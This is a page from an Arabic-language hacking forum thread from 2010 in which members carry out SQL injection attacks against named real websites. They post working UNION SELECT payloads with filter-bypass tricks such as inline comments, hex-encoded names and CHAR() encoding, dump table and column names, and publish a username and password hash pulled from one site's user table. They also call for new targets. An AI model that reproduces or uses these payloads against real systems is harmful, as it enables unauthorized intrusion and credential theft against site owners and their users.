:: vBspiders Professional Network ::
صفحة 5 من 27 « الأولى 34 5 6715 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

aircrack -ng 12-12-2010 01:34 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 266645)
الحقنة وصلت إلى
كود:
http://www.northernharbour.com/gallery.php?id=-5%20/*!union*/%20%20select%201,2,3,/*!concat*/%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns--
هل من إرشادات
لأني جربت ال unhex(hex())
وجربت /*!*/
و مانفعو :)
هلا اخي
media_pictures:other:mexpress_2894229478

حقنتك صحيحة كمل
انت حبيت تستعرض الجداول ضيف الامر
limit
شوف معي
كود:
http://www.northernharbour.com/gallery.php?id=-5 union  /*!select*/  1,2,3,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+limit+1,1--
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_sc hema
فهمت علي اخي بس انت كمل حقنتك عادي بدون اضافة الامر limit لغاية لما تجي طلع اليوزرات اوكي يعني

كود:
/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97,
تسلم مشرفنا الغالي

إسلام العالم 12-12-2010 03:06 AM
اقتباس:
http://www.northernharbour.com/galle...re+column_name +like+char(37, 112, 97, 115, 115, 37)--
الباس : wef.xIRu/YVfo أكيد فكها كتير صعب
اليوزر : group_id

agentsimo 12-12-2010 04:57 AM
السلام عليكم
بفففففففف دائما القاكم بداتو علي الحقن بففف دائما اتي متاخرررررر
المهم لقد حقنت الموقع
عدد الاعمدة 5
http://www.northernharbour.com/gallery.php?id=5 UNION /*!select*/ 1,2,3,4,5--
تابل نايم يوزر calendar_users
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,table_name,5+from+information_schema.columns +where+column_name+like+CHAR(37, 112, 97, 115, 37)--
تابل يوزر

http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,column_name,5+from+information_schema.column s+where+table_name=0x63616c656e6461725f7573657273+ limit+1,1--
تابل باس
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,column_name,5+from+information_schema.column s+where+table_name=0x63616c656e6461725f7573657273+ limit+2,1--
يوزر mexpress
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,username,5+from+calendar_users--
الباس wef.xIRu/YVfo
http://www.northernharbour.com/gallery.php?id=-5 UNION /*!select*/ 1,2,3,password,5+from+calendar_users--
و في الاخير اتمنى ان اكون انا اول من جلب الحقنة الكاملة للموقع :c

agentsimo 12-12-2010 05:01 AM
طبعا اصدار القاعدة البينات هو 5
و بالنسبة لصفحة الادمين فلم اجدها

darkman.dz 12-12-2010 12:40 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 266724)
هلا اخي
media_pictures:other:mexpress_2894229478

حقنتك صحيحة كمل
انت حبيت تستعرض الجداول ضيف الامر
limit
شوف معي
كود:
http://www.northernharbour.com/gallery.php?id=-5 union  /*!select*/  1,2,3,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+limit+1,1--
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_sc hema
فهمت علي اخي بس انت كمل حقنتك عادي بدون اضافة الامر limit لغاية لما تجي طلع اليوزرات اوكي يعني

كود:
/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97,
تسلم مشرفنا الغالي
أخي عبد الصمد
أنا أعرف الحقن جيدا
و أعرف إستخدام الأمر limit
لكن في متصفحي لا يعرض شيئا لغاية الآن
لا أعلم السبب لماذا
لكن مشكور على التوضيح يا وليد بلادي
1,2,3 viva l'algerie :)

واصل + أحاى تقييم ...لأحلى عضو :a09:

darkman.dz 12-12-2010 12:58 PM
أنظر يا أخي عبد الصمد
كود:
http://www.northernharbour.com/gallery.php?id=-5 /*!union*/  select 1,2,3,/*!concat*/(group_id,0x3a,username,0x3a,password),5+from+calendar_users--
جدول اليوزر
كود:
calendar_users:password:mexpress_2894229478
العمود الخاص باليوزر
كود:
calendar_users:username:mexpress_2894229478
العمود الخاص بالباسوورد
كود:
calendar_users:password:mexpress_2894229478
عمود ال id
كود:
calendar_users:group_id:mexpress_2894229478
أنا قصدت أنو الموقع لا يسمح بالأمر Limit للتنقل في الجداول قبل وضع الإستعلام
كود:
where+column_name+LIKE (%pass)%
لا نستطيع التخطي هنا ومعرفة جميع جداول الموقع
أرجو أن أكون قد وضحت الفكرة :)
وشكرا مرة أخرى

و الختام مسك وسلام :a26:

إسلام العالم 12-12-2010 01:36 PM
لا نستطيع التخطي هنا ومعرفة جميع جداول الموقع
أرجو أن أكون قد وضحت الفكرة :)
وشكرا مرة أخرى

و الختام مسك وسلام :a26:[/QUOTE]

نعم أخي صدقت فصاحب الموقع عامل حماية على أمر group

ولكن اليوزر الذي ظهر معك عير يلي ظهر معي ....مع أنه نفس الباسوورد...

darkman.dz 12-12-2010 01:56 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 266885)
لا نستطيع التخطي هنا ومعرفة جميع جداول الموقع
أرجو أن أكون قد وضحت الفكرة :)
وشكرا مرة أخرى

و الختام مسك وسلام :a26:

نعم أخي صدقت فصاحب الموقع عامل حماية على أمر group

ولكن اليوزر الذي ظهر معك عير يلي ظهر معي ....مع أنه نفس الباسوورد...[/QUOTE]

هههههههههههههههههههههههه
عصفورين بحجر واحد :cry[1]:

إسلام العالم 12-12-2010 02:45 PM
منتظرين أهداف جديدة

darkman.dz 12-12-2010 05:45 PM
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=11
هذف جديد

جاري المحاولة معه
و أنتم أيضا
:)

aircrack -ng 12-12-2010 08:54 PM
السلام عليكم
هاانا رجعت معذرة شباب انا كنت في العمل
مشرفنا انت مافهمتني شو كنت عم اقصد وانا مافهمتك شو كنت تقصد بس بعد التوضيح فهمتك كل التحية لك اخي الحبيب
الحقنة بس اقولكم شيء هالموقع كارثة ثقيل جدا الصفحة تقد ساعة عشان تظهر ههههههههههه
النت عندي 236 كيلو بايت ههههههههههههههه
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(user_name,0x3a,id,0x3a,pass_word),3,4,5+from+members
نرجع الموقع مانع كلمة concat
وايضا لما نحاول نتخطى بالامر
كود:
/*!concat*/
يجينا خطا
التخطي ب
كود:
/*!CONCAT
يعني نستعمل تكبير concat يعني تصير هيك CONCAT

واخر الحقنة استعملو الامر LIMIT للبحث عن شيح القبيلة الادمن هههههههههههه انا ماقدرت ابحث لانو النت بيفصل كثير وهالموقع ثقيل جدا

darkman.dz 12-12-2010 09:34 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 267038)
السلام عليكم
هاانا رجعت معذرة شباب انا كنت في العمل
مشرفنا انت مافهمتني شو كنت عم اقصد وانا مافهمتك شو كنت تقصد بس بعد التوضيح فهمتك كل التحية لك اخي الحبيب
الحقنة بس اقولكم شيء هالموقع كارثة ثقيل جدا الصفحة تقد ساعة عشان تظهر ههههههههههه
النت عندي 236 كيلو بايت ههههههههههههههه
ههههههههههههههههههههه
لا بأس أخي صمودة
هههههههههههههههههههههههه
التحية و التقدير والإحترام متبادلين
أعذروني لقد عدت الآن فقط :)
جاري حقن الموقع بإذن الله :)

aircrack -ng 12-12-2010 09:48 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 267069)
ههههههههههههههههههههه
لا بأس أخي صمودة
هههههههههههههههههههههههه
التحية و التقدير والإحترام متبادلين
أعذروني لقد عدت الآن فقط :)
جاري حقن الموقع بإذن الله :)
اهلا اخي ومشرفنا الغالي منور الغرفة
جاري البحث عن فئران تجارب جديدة هههههههههه

كل الاحترام والتقدير لك اخي

darkman.dz 12-12-2010 09:50 PM
أخي صمودة
بالنسبة للأنترنت
أنا أيضا 256 ميقا بايت
نتاع الزواولة
ههههههههههههههههههههههههههه

darkman.dz 12-12-2010 10:04 PM
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema)*/,3,4,5+from+informaion_schema.columns--
الحقنة وصلت إلى هنا
و الموقع ثقيل جدا
و النت تنقطع
جاري الإكمال بعد العودة :)


الساعة الآن 05:18 PM
صفحة 5 من 27 « الأولى 34 5 6715 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0